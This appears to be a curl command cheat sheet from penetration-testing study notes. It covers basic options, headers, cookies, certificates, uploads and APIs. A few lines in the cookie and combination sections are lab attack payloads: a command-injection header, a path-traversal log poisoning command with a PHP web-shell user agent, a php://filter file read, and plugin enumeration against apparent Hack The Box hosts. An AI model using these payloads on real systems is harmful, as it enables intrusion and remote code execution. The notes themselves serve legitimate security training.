curl

Client URL

Basic Options

Verbose
curl -v <IP>
More Verbose
curl -vvv <IP>
Show Errors
curl -S https://example.com
Load options from a local file
curl -K config.txt
Download a page/file
curl -O https://example.com
Save file with a custom name
curl https://example.com -o file.txt
Silent Status
curl -s inlanefreight.com/index.html
Follow Redirection
curl -L

Requests

Send POST request
curl -d "enter data here" http://IP:PORT
Retrieve Headers + body
curl -i https://example.com
Retrieve Only Headers
curl -I https://example.com
Manipulate Headers
curl -H 'HEADER:VALUE' https://example.com
Set User-Agent header
curl https://example.com -A 'Mozilla/5.0'
Credentials
curl -u user:pass https://example.com
Credentials Within URL
curl http://username:password@example.com:PORT

Cookies

Set Specific Cookie
curl -b 'PHPSESSID=c1nsa6op7vtk7kdis7bcnbadf1' http://www.example.net:PORT
Save Cookie in to a file
curl -X POST -d "flag=UHC{F1rst_5tep_2_Qualify}" -c cookies.txt -v http://10.10.11.128/challenge.php
Use cookie from the file
curl -H "X-FORWARDED-FOR: 1.1.1.1; ping -c 1 10.10.16.7;" -b cookies.txt -v http://10.10.11.128/firewall.php

Certificates

Skip SSL Certificate validation
curl -k -v https://example.com
Specify a CA file
curl --cacert /path/to/ca-cert.pem https://secure.example.com
Specify a CA directory
curl --capath /path/to/cacerts https://secure.example.com
Specify a Client Certificate
curl -E /path/to/client-cert.pem https://secure.example.com
Specify the Certificate format
curl -E /path/to/client-cert.pem --cert-type PEM|DER|ENG https://secure.example.com
Skip SSL + verbose + Client Certificate
curl -k -v -E /path/to/client_certificate.pem https://example.com
Skip SSL + Verbose + Specific Certificate
curl -k -v --cacert /path/to/ca_certificate.crt https://example.com
Skip SSL + verbose + Client Certificate & Key
curl -k -v --cert client_cert_and_key.pem --cert-type PEM https://test.me

File Uploads

File Upload
curl -T example.txt https://example.com/upload
File Upload + POST
curl -T example.txt -X POST https://example.com/upload
File upload + Authentication
curl -u user:pass -T example.txt https://example.com/upload
File Upload + Token Authentication
curl -u :YOUR_TOKEN -T example.txt https://example.com/upload
File Upload + Custom Header
curl -H "Authorization: Bearer YOUR_TOKEN" -T example.txt https://example.com/upload
File Upload + Multiple Custom Headers
curl -H "Authorization: Bearer YOUR_TOKEN" -H "Content-Type: application/json" -T example.txt https://example.com/upload
Multiple File Uploads
curl -T file1.txt -T file2.txt https://example.com/upload
File Upload as Form submission
curl -F "file=@example.txt" https://example.com/upload
File Upload + Additional Query Parameters
curl -T example.txt "https://example.com/upload?user=alice&timestamp=2024"
File Upload + Redirect
curl -L -T example.txt https://example.com/upload
File Upload + Retry
curl --retry 5 -T example.txt https://example.com/upload
File Upload to FTP server
curl -T example.txt ftp://ftp.example.com/upload/
File Upload + Custom HTTP Method
curl -X PATCH -T example.txt https://example.com/upload

APIs

Read all entries
curl -s http://<SERVER_IP>:<PORT>/api.php/city/ | jq
POST + Cookie
curl -X POST -d '{"search":"london"}' -b 'PHPSESSID=c1nsa6op7vtk7kdis7bcnbadf1' -H 'Content-Type: application/json' http://www.example.net:PORT/search.php
Create Entry
curl -X POST http://<SERVER_IP>:<PORT>/api.php/city/ -d '{"city_name":"HTB_City", "country_name":"HTB"}' -H 'Content-Type: application/json'
Update Entry
curl -X PUT http://<SERVER_IP>:<PORT>/api.php/city/london -d '{"city_name":"New_HTB_City", "country_name":"HTB"}' -H 'Content-Type: application/json'
Delete Entry
curl -X DELETE http://<SERVER_IP>:<PORT>/api.php/city/New_HTB_City

Combinations

Stealth + SSL Skip + Full details
curl -s -k -v -i IP
Skip SSL + Verbose + http2
curl -k -v --http2 <URL>
Stealth + Path Traversal + PHP Revshell Header
curl -s "http://83.136.249.227:31647/ilf_admin/index.php?log=../../../../../var/log/nginx/access.log" -A "<?php system($_GET['cmd']); ?>"
POST + Key-Value pairs Content Header
curl http://example.net:44626/example.php7 -X POST -d 'username=harry' -H 'Content-Type: application/x-www-form-urlencoded'
Loop Multiple Queries
for i in {1..100}; do echo -n "Post $i: "; curl -s http://enterprise.htb/wp-content/plugins/lcars/lcars_dbpost.php?query=$i | tr -s '\n'; done  | tee post-name-list
Wrapper + base64 Encode + Regex
curl http://94.237.55.12:38697/index.php\?language\=php://filter/read\=convert.base64-encode/resource\=configure |  awk 'BEGIN { body=0 } /^$/ { body=1 } body { print }' | grep -o '[A-Za-z0-9+/=]\{20,\}'
PreviousNmapNextffuz

Last updated